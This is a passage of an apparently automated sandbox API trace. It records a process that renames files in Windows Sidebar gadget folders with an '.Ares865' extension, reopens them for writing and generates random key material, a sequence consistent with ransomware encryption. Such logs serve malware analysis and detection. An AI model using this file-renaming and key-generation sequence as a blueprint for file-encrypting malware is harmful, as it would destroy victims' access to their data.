dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.879] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2962) returned 1 [0117.879] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.880] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.880] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.882] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.883] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.883] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.884] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\RSSFeeds.css.Ares865") returned 93 [0117.884] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\RSSFeeds.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\rssfeeds.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\RSSFeeds.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\rssfeeds.css.ares865"), dwFlags=0x1) returned 1 [0117.885] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\RSSFeeds.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\rssfeeds.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.885] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3016) returned 1 [0117.885] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.886] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.886] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.888] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.889] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.889] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.889] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\settings.css.Ares865") returned 93 [0117.889] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\settings.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\settings.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\settings.css.ares865"), dwFlags=0x1) returned 1 [0117.891] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\settings.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\settings.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.891] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1254) returned 1 [0117.891] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.892] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.892] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.894] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.895] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.895] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.895] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget" [0117.896] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png.Ares865") returned 84 [0117.896] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\drag.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\drag.png.ares865"), dwFlags=0x1) returned 1 [0117.898] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\drag.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.898] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31315) returned 1 [0117.898] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.899] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.899] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.907] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.908] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.908] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.909] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png.Ares865") returned 84 [0117.909] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\icon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\icon.png.ares865"), dwFlags=0x1) returned 1 [0117.912] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\icon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.912] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9563) returned 1 [0117.913] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.913] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.913] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.925] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.925] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.925] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.926] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png.Ares865") returned 84 [0117.926] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\logo.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\logo.png.ares865"), dwFlags=0x1) returned 1 [0117.929] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\logo.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.929] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6166) returned 1 [0117.929] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.930] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.930] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.933] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.933] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.933] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.934] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images" [0117.935] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png.Ares865") returned 88 [0117.935] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\0.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\0.png.ares865"), dwFlags=0x1) returned 1 [0117.937] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\0.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.937] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2850) returned 1 [0117.937] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.938] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.938] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.943] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.953] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.953] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.956] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png.Ares865") returned 88 [0117.956] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\1.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\1.png.ares865"), dwFlags=0x1) returned 1 [0117.969] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\1.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.973] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21283) returned 1 [0117.977] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.982] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.982] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.001] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.006] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.006] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.007] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png.Ares865") returned 89 [0118.007] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\10.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\10.png.ares865"), dwFlags=0x1) returned 1 [0118.009] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\10.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.009] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24128) returned 1 [0118.009] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.010] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.010] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.013] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.014] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.014] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.015] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png.Ares865") returned 89 [0118.015] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\11.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\11.png.ares865"), dwFlags=0x1) returned 1 [0118.016] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\11.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.016] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26934) returned 1 [0118.017] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.017] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.017] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.021] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.021] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.021] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.022] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png.Ares865") returned 88 [0118.022] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\2.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\2.png.ares865"), dwFlags=0x1) returned 1 [0118.024] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\2.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.024] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29200) returned 1 [0118.024] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.025] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.025] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.032] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.033] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.033] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.034] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png.Ares865") returned 88 [0118.034] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\3.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\3.png.ares865"), dwFlags=0x1) returned 1 [0118.035] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\3.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.036] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24397) returned 1 [0118.036] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.037] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.037] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.039] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.040] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.040] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.041] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png.Ares865") returned 88 [0118.041] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\4.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\4.png.ares865"), dwFlags=0x1) returned 1 [0118.043] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\4.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.043] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15852) returned 1 [0118.043] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.044] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.044] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.046] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.047] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.047] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.048] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png.Ares865") returned 88 [0118.048] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\5.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\5.png.ares865"), dwFlags=0x1) returned 1 [0118.049] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\5.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.049] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25021) returned 1 [0118.050] CryptAcquireContextW (in: phProv=0x2ccce54, 